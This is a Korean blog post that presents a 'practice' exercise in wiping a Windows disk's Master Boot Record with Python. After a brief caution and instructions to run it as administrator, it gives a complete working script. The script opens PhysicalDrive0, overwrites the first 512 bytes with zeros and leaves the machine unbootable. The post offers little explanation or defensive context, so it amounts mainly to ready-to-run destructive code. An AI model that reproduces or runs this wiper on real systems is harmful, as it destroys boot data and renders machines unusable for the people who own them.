Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- 12기
- nurisec
- Service
- PHP
- 프로젝트
- UKPT level
- 파이썬
- UKPT
- 여행
- MITRE ATT&CK
- 경기팀
- 정보보안
- 국가정보원
- 화학물질불법유통온라인감시단
- 대외활동
- suninatas
- 불법유통
- HTML
- 웹 해킹 입문
- 국정원
- 기타정보
- 화학물질안전원
- 도구모음
- Los
- 불법유통근절
- 국가기록원
- webhacking
- 연구모임
- codeup
- 화학물질
Archives
- Today
- Total
agencies
파이썬 MBR 변경 실습 (부팅 불가) 본문
※ 해당 프로그램을 실행하기에 앞서 주의를 부탁드립니다.
mbr 프로그램을 관리자 권한으로 실행합니다.
MBR 부분이 0x00 의 값으로 모두 변경이 되었습니다.
재부팅을 하면 다음과 같은 화면이 나타납니다.
import time
# Specify the disk to read and write (e.g., "\\\\.\\PhysicalDrive0")
disk_path = r"\\.\PhysicalDrive0"
try:
# Open the disk for writing
with open(disk_path, "rb+") as disk_file:
# Seek to the beginning of the disk (MBR start)
disk_file.seek(0)
# Modify MBR to all 0x00
modified_mbr = b'\x00' * 512
# Write the modified MBR to the disk
disk_file.write(modified_mbr)
print("MBR successfully modified and saved as all 0x00.")
except Exception as e:
print(f"Failed to modify MBR: {str(e)}")
time.sleep(10000)
'Ⅰ. 프로그래밍' 카테고리의 다른 글
파이썬 프로그래밍 (터틀그래픽) (0) | 2024.01.29 |
---|---|
파이썬 프로그래밍을 통한 ben.exe 프로그램 제작하기 (0) | 2024.01.29 |
파이썬 프로그래밍 (0) | 2024.01.29 |
파이썬 해킹 입문 (해킹기술 및 개요) (0) | 2024.01.29 |
파이썬 키보드 후킹 (0) | 2024.01.29 |